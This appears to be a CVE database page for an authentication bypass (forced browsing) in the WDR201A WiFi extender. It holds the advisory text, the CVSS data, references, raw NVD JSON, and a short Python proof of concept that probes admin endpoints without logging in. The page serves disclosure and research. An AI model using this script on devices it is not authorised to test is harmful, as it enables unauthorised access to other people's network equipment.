CVE-2026-30702

Description

The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) implements a broken authentication mechanism in its web management interface. The login page does not properly enforce session validation, allowing attackers to bypass authentication by directly accessing restricted web application endpoints through forced browsing

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A firmware < LFMZX28040922V1.02

WiFi Extender WDR201A hardware V2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-30702 PoC - Authentication Bypass on WDR201A
# Target: WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02)

target_ip = "192.168.0.1"  # Typical default IP
base_url = f"http://{target_ip}"

# Endpoints that should require authentication
protected_endpoints = [
    "/admin/status.asp",
    "/admin/network.asp",
    "/admin/wireless.asp",
    "/admin/system.asp",
    "/admin/firmware.asp"
]

def test_auth_bypass():
    """Test for authentication bypass vulnerability"""
    for endpoint in protected_endpoints:
        url = base_url + endpoint
        try:
            # Direct access without authentication
            response = requests.get(url, timeout=5)
            
            # Check if we can access protected resource
            if response.status_code == 200 and "login" not in response.text.lower():
                print(f"[+] VULNERABLE: {endpoint} - Authentication bypassed!")
                print(f"    Status: {response.status_code}")
            elif response.status_code == 200:
                print(f"[-] Protected: {endpoint} - Requires authentication")
            else:
                print(f"[*] Endpoint: {endpoint} - Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

if __name__ == "__main__":
    print("CVE-2026-30702 - WDR201A Authentication Bypass Test")
    print("=" * 50)
    test_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30702
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30702
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30702/
[4] VulDB https://vuldb.com/cve/CVE-2026-30702
[5] https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html
[6] https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China
[7] https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30702", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.860", "lastModified": "2026-03-23T16:16:45.750", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) implements a broken authentication mechanism in its web management interface. The login page does not properly enforce session validation, allowing attackers to bypass authentication by directly accessing restricted web application endpoints through forced browsing"}, {"lang": "es", "value": "El Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) implementa un mecanismo de autenticación defectuoso en su interfaz de gestión web. La página de inicio de sesión no aplica correctamente la validación de sesión, permitiendo a los atacantes eludir la autenticación accediendo directamente a puntos finales restringidos de la aplicación web mediante navegación forzada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}